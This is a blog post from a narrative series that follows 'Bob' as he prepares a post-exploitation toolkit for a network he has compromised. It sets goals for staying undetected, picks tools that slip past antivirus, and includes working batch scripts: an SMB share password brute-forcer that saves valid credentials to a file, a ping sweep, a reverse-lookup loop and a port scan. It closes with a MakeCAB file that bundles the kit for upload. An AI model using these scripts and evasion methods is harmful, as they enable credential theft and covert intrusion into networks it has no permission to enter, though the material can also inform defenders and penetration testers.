Tuesday, November 3, 2009

Bob Prepares For Action

Previously in Bob land.......

Bob's back and he's been thinking about his new playground. He's realised that if he's not careful he'll attract attention and get into trouble, so he needs to lay down some ground rules and define some goals before he goes back on the Wallifords network. If he's going to get the maximum benefit from Wallifords as a training ground rather than a playground, he needs to get serious and stop recklessly throwing exploits at any old box.

Goal 1
To extract as much information about the Walliford Network as possible.

Goal 2
To identify high value targets and gain access to those systems.

Goal 3
To remain undetected.

Goal 4
To generally have fun, learn his tools and practice his techniques.


Pretty simple goals, eh? Bob knows that to remain undetected he's going to have to make as much use as he can of the tools that are already on the compromised host. He needs to use as many legitimate tools as possible and only upload those that won't be detected by AV.

Getting his tools onto the compromised hosts is important, but uploading them one by one is a pain in the arse. Then Bob remembers something he heard in a great presentation on post exploitation from Dean Der Beer: a reference to a tool called Metacab. He takes a look at Metacab but decides against using it. Bob really likes the idea of Metacab, but he wants a different set of tools, so he goes about making his own version. Using the Makecab tool already in XP he creates a cab file containing the few additional tools he needs, knowing he can upload the cab and extract the files from it with native Windows tools straight from the command line.

The one tool he cannot do without is netcat, but AV picks it up quite easily. Then Bob remembers that his Nmap directory has ncat, a new version of netcat with loads of additional features. Bob runs it through VirusTotal to see what gives.

Perfect: only detected by one AV product out of 41. Now Bob knows he can use this tool for file transfer, creating proxies and even backdoors. Many of the other tools he decides to include in the cab file come from the Windows Resource Kit, so there is very little chance of them being detected by AV or flagged as Potentially Unwanted Applications (PUA) on the host.

Tools List

cmd.exe
dsadd.exe
dsget.exe
dsquery.exe
edit.com
ncat.exe
net.exe
ngrep.exe
pmon.exe
PortQry.exe
reg.exe
srvinfo.exe
WinDump.exe

As expected, VirusTotal finds nothing wrong with his other tools, but then again, why would it?

So, looking at his tools, Bob has ncat for backdoors and file transfer, a port scanner, pmon for keeping an eye on his host's CPU and memory, tools for extracting anything out of Active Directory, packet sniffers, and SrvInfo, which is great for looking at the details of servers. He also includes a couple of standard tools, Net.exe and Cmd.exe, just in case they have been removed by the sysadmin. Hopefully he's got everything he needs for a successful expedition into the Walliford Fries network. If not, he'll go back to the drawing board and create a new cab file.

Bob also creates a few bat files that he can use for scanning and password checks. It's easier to create these now and include them in the cab than it is to write them on the fly.

His first bat file is a simple bruteforce script that uses in-built Windows functions to bruteforce shares. He'll supply a user list (names.txt) and a common password list (words.txt) to the bat file. The password list will contain common passwords and can be tweaked using the in-built DOS Edit tool once he's on the target, and the user list will be generated with his enumeration tool, dsquery. After running the bruteforce script any successful logins will be saved to a text file (creds.txt). Bob knows from performing password audits in his other life that even when complex passwords are enforced, users will still pick dumb complex passwords such as Password01. And when it comes time to change it... well, of course, we're looking at Password02!

Before any bruteforcing is done Bob will check the password policy so he doesn't trip any account lockout thresholds. So if the account lockout policy triggers after 3 incorrect attempts in half an hour, he'll just try 2 common passwords on all accounts. As they say, slow and steady wins the race.

Set /P target="Enter Target To Perform BF on:"
For /F %%i in (names.txt) do @(for /f %%j in (words.txt) do @echo %%i:%%j & @net use \\%target% %%j /u:%%i 2>nul && echo %%i:%%j >> ./creds.txt && net use \\%target% /del)

Bob will use either net.exe or dsquery.exe to populate his names.txt file. Dsquery is fantastic for ripping through Active Directory, and if you know what you're doing you can use the ds* tools to find out pretty much anything about users and computers. The beauty is, these tools can be run from any user account, so you don't need to pop an admin's box to get some juicy info.

The next bat file that Bob will include checks for hosts that respond to a ping and outputs the results to a file.

set /P subnet="Enter subnet:"
REM one echo request per address; hosts that answer are appended to alive.txt
for /L %%i in (1,1,255) do @ping -n 1 -w 1 %subnet%.%%i | find "Reply" >> alive.txt

Another bat file is created to perform reverse lookups using an nslookup FOR loop.

set /P subnet="Enter subnet:"
For /L %%i in (1,1,255) do @nslookup %subnet%.%%i 2>nul | find "Name" && echo %subnet%.%%i

And finally, a bat file to use the PortQry tool for port scans against the hosts listed in a hosts file (hosts.txt). Again he can use dsquery or net.exe to populate the hosts file.

For /F %%i in (hosts.txt) do @PortQry.exe -n %%i -o 21,22,23,25,80,139,445,3389,1433 -p tcp

OK, that'll do for now. Bob builds the ddf file for his cab and creates the cab.

;*** MakeCAB Directive File for bin
;
.OPTION EXPLICIT ;*** Generate errors

.Set MaxCabinetSize=0
.Set MaxDiskSize=0

.Set CabinetNameTemplate=bin.cab

.Set DiskDirectoryTemplate=CDROM ;

.Set CompressionType=MSZIP ;

.Set UniqueFiles="OFF"

.Set Cabinet=on
.Set DiskDirectory1=bin
bf.bat
cmd.exe
dsadd.exe
dsget.exe
dsquery.exe
edit.com
hosts.txt
names.txt
ncat.exe
net.exe
ngrep.exe
pingsweep.bat
pmon.exe
port-scan.bat
PortQry.exe
reg.exe
rev-lookup.bat
srvinfo.exe
WinDump.exe
words.txt
;*** EOF

And to build his super duper cab, he makes sure all the tools, bat files and the bin.ddf file are in the same directory and.....

makecab /F bin.ddf

Perfect: after building it, his cab file comes in at less than 1MB. Bob honestly couldn't be happier. He'll have to use the Windows built-in tool Expand.exe to get his files out of the cab.

expand /F:* bin.cab .

Right, with that done Bob is almost ready to hop onto his target, put his tools to good use and start his network exploration.

Bob Builds His Custom Payloads - Part 4 .......coming next